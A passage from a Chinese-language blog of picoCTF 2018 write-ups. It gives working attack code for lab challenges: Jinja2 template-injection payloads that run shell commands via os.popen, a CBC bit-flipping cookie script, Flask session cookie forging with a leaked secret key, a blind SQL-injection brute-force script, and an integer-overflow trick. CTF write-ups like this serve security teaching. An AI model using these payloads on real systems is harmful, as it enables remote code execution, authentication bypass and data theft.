souaxwiy:</span><br><span class="line"></span><br><span class="line">-solw zr, bqkst! solw zr, yoz cwuaczi jwxzqf!</span><br><span class="line"></span><br><span class="line">xoiwlkiy tw sulw coaduan ukn lozkfwn ftw aozkn ezkawxf. tw cuswn uvozf</span><br><span class="line">ukn viwxxwn eauhwiy ftaqsw ftw fodwa, ftw xzaaozknqke iukn ukn ftw</span><br><span class="line">udubqke lozkfuqkx. ftwk, sufstqke xqetf oc xfwrtwk nwnuizx, tw vwkf</span><br><span class="line">foduanx tql ukn lunw aurqn saoxxwx qk ftw uqa, ezaeiqke qk tqx ftaouf</span><br><span class="line">ukn xtubqke tqx twun. xfwrtwk nwnuizx, nqxriwuxwn ukn xiwwry, iwukwn</span><br><span class="line">tqx ualx ok ftw for oc ftw xfuqasuxw ukn ioobwn soiniy uf ftw xtubqke</span><br><span class="line">ezaeiqke cusw ftuf viwxxwn tql, wpzqkw qk qfx iwkeft, ukn uf ftw iqetf</span><br><span class="line">zkfokxzawn tuqa, eauqkwn ukn tzwn iqbw ruiw oub.</span><br><span class="line"></span><br><span class="line">vzsb lziiqeuk rwwrwn uk qkxfukf zknwa ftw lqaaoa ukn ftwk sohwawn ftw</span><br><span class="line">vodi xluafiy.</span><br><span class="line"></span><br><span class="line">-vusb fo vuaausbx! tw xuqn xfwakiy.</span><br><span class="line"></span><br><span class="line">tw unnwn qk u rawustwax fokw:</span><br><span class="line"></span><br><span class="line">-coa ftqx, o nwuaiy vwiohwn, qx ftw ewkzqkw staqxfqkw: vony ukn xozi</span><br><span class="line">ukn vioon ukn ozkx. xiod lzxqs, riwuxw. xtzf yoza wywx, ewkfx. okw</span><br><span class="line">lolwkf. u iqffiw faozviw uvozf ftoxw dtqfw soarzxsiwx. xqiwksw, uii.</span><br><span class="line"></span><br><span class="line">tw rwwawn xqnwduyx zr ukn euhw u ioke xiod dtqxfiw oc suii, ftwk ruzxwn</span><br><span class="line">udtqiw qk aurf uffwkfqok, tqx whwk dtqfw fwwft eiqxfwkqke twaw ukn ftwaw</span><br><span class="line">dqft eoin roqkfx. stayxoxfolox. fdo xfaoke xtaqii dtqxfiwx ukxdwawn</span><br><span class="line">ftaozet ftw suil.</span><br><span class="line"></span><br><span class="line">-ftukbx, oin stur, tw saqwn vaqxbiy. ftuf dqii no kqswiy. xdqfst occ</span><br><span class="line">ftw szaawkf, dqii yoz?</span><br><span class="line"></span><br><span class="line">tw xbqrrwn occ ftw ezkawxf ukn ioobwn eauhwiy uf tqx dufstwa, euftwaqke</span><br><span class="line">uvozf tqx iwex ftw iooxw coinx oc tqx eodk. ftw rizlr xtunodwn cusw ukn</span><br><span class="line">xziiwk ohui jodi awsuiiwn u rawiufw, rufaok oc uafx qk ftw lqnniw uewx.</span><br><span class="line">u riwuxukf xlqiw vaobw pzqwfiy ohwa tqx iqrx.</span><br></pre></td></tr></table></figure>

<p>代替密码</p>
<h3 id="in-out-error"><a href="#in-out-error" class="headerlink" title="in out error"></a>in out error</h3><p>stdin (0), stdout (1), and stderr (2)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;Please may I have the flag?&quot; | ./in-out-error 1&gt;/dev/null 2&gt;~/flag</span><br></pre></td></tr></table></figure>

<h3 id="store"><a href="#store" class="headerlink" title="store"></a>store</h3><p>整数溢出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">Welcome to the Store App V1.0</span><br><span class="line">World&apos;s Most Secure Purchasing App</span><br><span class="line"></span><br><span class="line">[1] Check Account Balance</span><br><span class="line"></span><br><span class="line">[2] Buy Stuff</span><br><span class="line"></span><br><span class="line">[3] Exit</span><br><span class="line"></span><br><span class="line"> Enter a menu selection</span><br><span class="line">2</span><br><span class="line">Current Auctions</span><br><span class="line">[1] I Can&apos;t Believe its not a Flag!</span><br><span class="line">[2] Real Flag</span><br><span class="line">1</span><br><span class="line">Imitation Flags cost 1000 each, how many would you like?</span><br><span class="line">10000000000000000</span><br><span class="line"></span><br><span class="line">Your total cost is: -1981284352</span><br><span class="line"></span><br><span class="line">Your new balance: 1981285452</span><br><span class="line">Welcome to the Store App V1.0</span><br><span class="line">World&apos;s Most Secure Purchasing App</span><br><span class="line"></span><br><span class="line">[1] Check Account Balance</span><br><span class="line"></span><br><span class="line">[2] Buy Stuff</span><br><span class="line"></span><br><span class="line">[3] Exit</span><br><span class="line"></span><br><span class="line"> Enter a menu selection</span><br><span class="line">2</span><br><span class="line">Current Auctions</span><br><span class="line">[1] I Can&apos;t Believe its not a Flag!</span><br><span class="line">[2] Real Flag</span><br><span class="line">2</span><br><span class="line">A genuine Flag costs 100000 dollars, and we only have 1 in stock</span><br><span class="line">Enter 1 to purchase1</span><br><span class="line">YOUR FLAG IS: picoCTF&#123;numb3r3_4r3nt_s4f3_03054e5d&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Secure-Logon"><a href="#Secure-Logon" class="headerlink" title="Secure Logon"></a>Secure Logon</h3><p>cbc翻转字节攻击</p>
<p>exp1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line"></span><br><span class="line">cookie = base64.b64decode(&quot;4Ol7IYySLlyrKHeIo7UFtoVhkpQ7gmkscYXp8ctZwmroUWhof9YrZYYURyM2TpLze6bO/Vpo40rJ4R1zQXg/yzZe0mUopeHZ+dztZGm51vI=&quot;)</span><br><span class="line">flip = ord(cookie[10]) ^ ord(&quot;0&quot;) ^ ord(&quot;1&quot;)</span><br><span class="line">newCookie = base64.b64encode(cookie[:10]+chr(flip)+cookie[11:])</span><br><span class="line">print newCookie</span><br></pre></td></tr></table></figure>

<p>exp2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; from pwn import *</span><br><span class="line">&gt;&gt;&gt; import json</span><br><span class="line">&gt;&gt;&gt; cookie = &#123;&#125;</span><br><span class="line">&gt;&gt;&gt; cookie[&apos;password&apos;] = &apos;abcdefgh1111111&apos;</span><br><span class="line">&gt;&gt;&gt; cookie[&apos;username&apos;] = &apos;ab&apos;</span><br><span class="line">&gt;&gt;&gt; cookie[&apos;admin&apos;] = 0</span><br><span class="line">&gt;&gt;&gt; json.dumps(cookie, sort_keys=True)</span><br><span class="line">&apos;&#123;&quot;admin&quot;: 0, &quot;password&quot;: &quot;abcdefgh1111111&quot;, &quot;username&quot;: &quot;ab&quot;&#125;&apos;</span><br><span class="line">&gt;&gt;&gt; json.dumps(cookie, sort_keys=True).index(&apos;0&apos;)</span><br><span class="line">10</span><br><span class="line">&gt;&gt;&gt; c = &apos;ePDqhdXDqtxP/rsO0J11E7DE22lyUv4N1aP7WBSlOOgw0v1TVyYrmxHl278LbuI9jxr0J7NuXlKKSTXl79FFF+E3PQP00TidEtlGpf9W1rQ=&apos;.decode(&apos;base64&apos;)</span><br><span class="line">&gt;&gt;&gt; c = c[:10] + xor(c[10], &apos;0&apos;, &apos;1&apos;) + c[11:]</span><br><span class="line">&gt;&gt;&gt; c.encode(&apos;base64&apos;).replace(&apos;\n&apos;,&apos;&apos;)</span><br><span class="line">&apos;ePDqhdXDqtxP/roO0J11E7DE22lyUv4N1aP7WBSlOOgw0v1TVyYrmxHl278LbuI9jxr0J7NuXlKKSTXl79FFF+E3PQP00TidEtlGpf9W1rQ=&apos;</span><br></pre></td></tr></table></figure>

<h3 id="Flaskcards"><a href="#Flaskcards" class="headerlink" title="Flaskcards"></a>Flaskcards</h3><p>题目名字提示flask，想到模板注入</p>
<p>注册登陆之后有<code>Create Card</code>和<code>List Cards</code>两个功能</p>
<p>在<code>Create Card</code>页面尝试模板注入，然后去<code>List Cards</code>看发现存在模板注入</p>
<p><img src="https://s1.ax1x.com/2018/10/09/iJbBAf.png" alt="iJbBAf.png"></p>
<p><code>[].__class__.__bases__[0].__subclasses__()</code>查看类，并没有file类</p>
<p><code>{{[].__class__.__bases__[0].__subclasses__()[60].__init__.__globals__.__builtins__.__import__('os')}}</code>能得到os模块</p>
<p><code>{{[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}</code>执行命令</p>
<p>但是在执行<code>cat app/config.py</code>的时候没有显示</p>
<p>尝试<br><code>{{[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen(request.args.cmd).read()}}</code><br>url:<code>http://2018shell1.picoctf.com:17012/list_cards?cmd=cat%20app/config.py</code></p>
<p>得到源码，有flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">import os</span><br><span class="line"></span><br><span class="line">basedir = os.path.abspath(os.path.dirname(__file__))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class Config(object):</span><br><span class="line">    SECRET_KEY = &apos;picoCTF&#123;secret_keys_to_the_kingdom_2a7bf92c&#125;&apos;</span><br><span class="line">    #SQLALCHEMY_DATABASE_URI = os.environ.get(&apos;DATABSE_URL&apos;) or &apos;sqlite:///&apos;+os.path.join(basedir,&apos;app.db&apos;)</span><br><span class="line">    SQLALCHEMY_DATABASE_URI = &quot;sqlite://&quot;</span><br><span class="line">    SQLALCHEMY_TRACK_MODIFICATIONS = False</span><br></pre></td></tr></table></figure>

<h4 id="看了其他的wp，发现一种更简单的方法"><a href="#看了其他的wp，发现一种更简单的方法" class="headerlink" title="看了其他的wp，发现一种更简单的方法"></a>看了其他的wp，发现一种更简单的方法</h4><p>flag就是flask中的secret_key,可以不用执行命令或读文件，直接用<code>{{config}}</code>输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">Question:&lt;Config &#123;&apos;JSON_AS_ASCII&apos;: True, &apos;SESSION_COOKIE_SECURE&apos;: False,</span><br><span class="line">&apos;SQLALCHEMY_BINDS&apos;: None, &apos;MAX_CONTENT_LENGTH&apos;: None, &apos;JSON_SORT_KEYS&apos;: True,</span><br><span class="line">&apos;JSONIFY_MIMETYPE&apos;: &apos;application/json&apos;, &apos;BOOTSTRAP_SERVE_LOCAL&apos;: False,</span><br><span class="line">&apos;SESSION_COOKIE_SAMESITE&apos;: None, &apos;SESSION_REFRESH_EACH_REQUEST&apos;: True,</span><br><span class="line">&apos;PREFERRED_URL_SCHEME&apos;: &apos;http&apos;, &apos;SESSION_COOKIE_PATH&apos;: None,</span><br><span class="line">&apos;SQLALCHEMY_NATIVE_UNICODE&apos;: None, &apos;SESSION_COOKIE_DOMAIN&apos;: False,</span><br><span class="line">&apos;PROPAGATE_EXCEPTIONS&apos;: None, &apos;APPLICATION_ROOT&apos;: &apos;/&apos;,</span><br><span class="line">&apos;SQLALCHEMY_COMMIT_ON_TEARDOWN&apos;: False, &apos;MAX_COOKIE_SIZE&apos;: 4093,</span><br><span class="line">&apos;SQLALCHEMY_POOL_SIZE&apos;: None, &apos;SESSION_COOKIE_NAME&apos;: &apos;session&apos;,</span><br><span class="line">&apos;BOOTSTRAP_QUERYSTRING_REVVING&apos;: True, &apos;PERMANENT_SESSION_LIFETIME&apos;:</span><br><span class="line">datetime.timedelta(31), &apos;EXPLAIN_TEMPLATE_LOADING&apos;: False, &apos;TESTING&apos;: False,</span><br><span class="line">&apos;SEND_FILE_MAX_AGE_DEFAULT&apos;: datetime.timedelta(0, 43200),</span><br><span class="line">&apos;BOOTSTRAP_LOCAL_SUBDOMAIN&apos;: None, &apos;ENV&apos;: &apos;production&apos;,</span><br><span class="line">&apos;PRESERVE_CONTEXT_ON_EXCEPTION&apos;: None, &apos;TEMPLATES_AUTO_RELOAD&apos;: None,</span><br><span class="line">&apos;SQLALCHEMY_RECORD_QUERIES&apos;: None, &apos;USE_X_SENDFILE&apos;: False,</span><br><span class="line">&apos;SQLALCHEMY_TRACK_MODIFICATIONS&apos;: False, &apos;TRAP_BAD_REQUEST_ERRORS&apos;: None,</span><br><span class="line">&apos;SQLALCHEMY_DATABASE_URI&apos;: &apos;sqlite://&apos;, &apos;BOOTSTRAP_CDN_FORCE_SSL&apos;: False,</span><br><span class="line">&apos;SERVER_NAME&apos;: None, &apos;BOOTSTRAP_USE_MINIFIED&apos;: True, &apos;SQLALCHEMY_POOL_TIMEOUT&apos;: None,</span><br><span class="line">&apos;SQLALCHEMY_POOL_RECYCLE&apos;: None, &apos;JSONIFY_PRETTYPRINT_REGULAR&apos;: False,</span><br><span class="line">&apos;SQLALCHEMY_ECHO&apos;: False, &apos;SESSION_COOKIE_HTTPONLY&apos;: True, &apos;DEBUG&apos;: False,</span><br><span class="line">&apos;SQLALCHEMY_MAX_OVERFLOW&apos;: None, &apos;TRAP_HTTP_EXCEPTIONS&apos;: False, &apos;SECRET_KEY&apos;:</span><br><span class="line">&apos;picoCTF&#123;secret_keys_to_the_kingdom_2a7bf92c&#125;&apos;&#125;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Flaskcards-Skeleton-Key"><a href="#Flaskcards-Skeleton-Key" class="headerlink" title="Flaskcards Skeleton Key"></a>Flaskcards Skeleton Key</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Nice! You found out they were sending the Secret_key: a7a8342f9b41fcb062b13dd1167785f8. Now, can you find a way to log in as admin?</span><br></pre></td></tr></table></figure>

<p>给出了Secret_key，可以伪造成admin</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">λ python session_cookie_manager.py decode -c &quot;.eJwlj0tuwzAMRO-idRbmT6RyGYOkRDRI0QJ2uypy97rodgZv8Oan7XWs863dy9_PdWv7Y7Z 7S1wFIhJRlhjBhjCyYlzpZNHC3pmMM0Frk-klzExqQsSbg4maxqARiKC5AV0zNj2oTB0GXB2H8SSaa4l3EXDL4T2sNs92a3ketX99PtfHn4_yLLReA7R7EkrfxJAqQFEic9Jwnn5x3-c6_k_09voFkW0-tg.DqTROA.L9x_aizWtZ_KkPK21n4lQR44XJ8&quot; -s &quot;a7a8342f9b41fcb062b13dd1167785f8&quot;</span><br><span class="line"></span><br><span class="line">&#123;u&apos;csrf_token&apos;: u&apos;c74df286f9176ac325605823fb1725bccd39a4da&apos;, u&apos;_fresh&apos;: False, u&apos;user_id&apos;: u&apos;6&apos;, u&apos;_id&apos;: u&apos;c2ef1555bbf8c2bb48219cfb9f15d457f2664384cc17f05daf544437853340a185787b939b2217c0138c28dab3f87a191b934b84d33dee5a6551a8c9a6b8f0ac&apos;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">λ python session_cookie_manager.py encode -s &quot;a7a8342f9b41fcb062b13dd1167785f8&quot; -t &quot;&#123;u&apos;csrf_token&apos;: u&apos;c74df286f9176ac325605823fb1725bccd39a4da&apos;, u&apos;_fresh&apos;: False,u&apos;user_id&apos;: u&apos;1&apos;, u&apos;_id&apos;: u&apos;c2ef1555bbf8c2bb48219cfb9f15d457f2664384cc17f05daf544437853340a185787b939b2217c0138c28dab3f87a191b934b84d33dee5a6551a8c9a6b8f0ac&apos;&#125;&quot;</span><br><span class="line"></span><br><span class="line">.eJwlj0tuwzAMRO-idRbmT6RyGYOkRDRI0QJ2uypy97rodgZv8Oan7XWs863dy9_PdWv7Y7Z7S1wFIhJRlhjBhjCyYlzpZNHC3pmMM0Frk-klzExqQsSbg4maxqARiKC5AV0zNj2oTB0GXB2H8SSaa4l3EXDL4T2sNs92a3ketX99PtfHn4_yLLReA7R7EkrfxJAqQFEic9Jwnn5x3-c6_k9Ae_0CkV4-sQ.DqTRyw.cKZSOtvA78vhFcF0OieDLBebCgk</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Welcome Admin</span><br><span class="line">Your flag is: picoCTF&#123;1_id_to_rule_them_all_92303c39&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Flaskcards-and-Freedom"><a href="#Flaskcards-and-Freedom" class="headerlink" title="Flaskcards and Freedom"></a>Flaskcards and Freedom</h3><p>和第一题一样也是模板注入，可以直接用第一题的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__(&apos;os&apos;).popen(&apos;cat flag&apos;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">picoCTF&#123;R_C_E_wont_let_me_be_85e92c3a&#125;</span><br></pre></td></tr></table></figure>

<h3 id="A-Simple-Question"><a href="#A-Simple-Question" class="headerlink" title="A Simple Question"></a>A Simple Question</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  include &quot;config.php&quot;;</span><br><span class="line">  ini_set(&apos;error_reporting&apos;, E_ALL);</span><br><span class="line">  ini_set(&apos;display_errors&apos;, &apos;On&apos;);</span><br><span class="line"></span><br><span class="line">  $answer = $_POST[&quot;answer&quot;];</span><br><span class="line">  $debug = $_POST[&quot;debug&quot;];</span><br><span class="line">  $query = &quot;SELECT * FROM answers WHERE answer=&apos;$answer&apos;&quot;;</span><br><span class="line">  echo &quot;&lt;pre&gt;&quot;;</span><br><span class="line">  echo &quot;SQL query: &quot;, htmlspecialchars($query), &quot;\n&quot;;</span><br><span class="line">  echo &quot;&lt;/pre&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">  $con = new SQLite3($database_file);</span><br><span class="line">  $result = $con-&gt;query($query);</span><br><span class="line"></span><br><span class="line">  $row = $result-&gt;fetchArray();</span><br><span class="line">  if($answer == $CANARY)  &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;Perfect!&lt;/h1&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;p&gt;Your flag is: $FLAG&lt;/p&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  elseif ($row) &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;You are so close.&lt;/h1&gt;&quot;;</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    echo &quot;&lt;h1&gt;Wrong.&lt;/h1&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>存在sql注入，只有<code>You are so close.</code>和<code>Wrong</code>两种回显，能进行盲注得出answer</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import string</span><br><span class="line"></span><br><span class="line">answer = &apos;&apos;</span><br><span class="line">for i in range(100):</span><br><span class="line">  for e in string.printable:</span><br><span class="line">    c = e</span><br><span class="line">    payload = &quot;&apos; or answer GLOB &apos;&#123;&#125;*&quot;.format(answer+c)</span><br><span class="line">    # &apos; OR answer LIKE &apos;</span><br><span class="line">    print payload</span><br><span class="line">    r = requests.post(&apos;http://2018shell1.picoctf.com:15987/answer2.php&apos;, data = &#123;&apos;answer&apos;: payload&#125;)</span><br><span class="line">    if &apos;so close&apos; in r.text:</span><br><span class="line">      print r.text</span><br><span class="line">      answer += c</span><br><span class="line">      print answer</span><br><span class="line">      break</span><br><span class="line"></span><br><span class="line"># 41AndSixSixths</span><br></pre></td></tr></table></figure>

<h3 id="Help-Me-Reset-2"><a href="#Help-Me-Reset-2" class="headerlink" title="Help Me Reset 2"></a>Help Me Reset 2</h3><p>每次刷新页面中的注释<code>&lt;!--Proudly maintained by barboza--&gt;</code>都会变化，结合题目，应该是提示的用户名</p>
<p>只有用户名存在才能重置用户的密码，就用注释中的</p>
<p>reset时会生成session，能进行解密</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;current&quot;:&quot;carmake&quot;,&quot;possible&quot;:[&quot;color&quot;,&quot;carmake&quot;,&quot;hero&quot;,&quot;food&quot;],&quot;right_count&quot;:0,&quot;user_data&quot;:&#123;&quot; t&quot;:[&quot;barboza&quot;,&quot;7362770948&quot;,0,&quot;orange&quot;,&quot;wolverine&quot;,&quot;Kia&quot;,&quot;hummus&quot;,&quot;davis\n&quot;]&#125;,&quot;wrong_count&quot;:0&#125;</span><br></pre></td></tr></table></figure>

<p>就是三个安全问题的答案，成功重置密码后登陆得到flag</p>

  </article>
</div>


    




</div>

<div class="footer-wrapper container">
  <footer class="footer clearfix">
    <div class="clearfix">
    <a href="https://daolgts.github.io" class="footer-logo">
      <i class="fa fa-github"></i>
    </a>
    <ul class="footer-social-link">
      <li>© 2019 daolgts</li>
      <li><a href="https://daolgts.github.io">Home</a></li>
      
      <li><a href="https://github.com/daolgts">Github</a></li>
      
    </ul>
    <div class="footer-theme-info">
      Theme <a href="//github.com/sabrinaluo/hexo-theme-replica">Replica</a>
      by <a href="//github.com/sabrinaluo">Hiitea</a> ❤ Powered by Hexo
    </div>
    </div>
    
  </footer>
</div>


<script>
  (function() {
    var cx = '005157513716557594323:jvii0oiejlb';
    var gcse = document.createElement('script');
    gcse.type = 'text/javascript';
    gcse.async = true;
    gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
      '//cse.google.com/cse.js?cx=' + cx;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(gcse, s);
  })();
</script>



<script src="/js/main.js"></script>

</body>
</html>
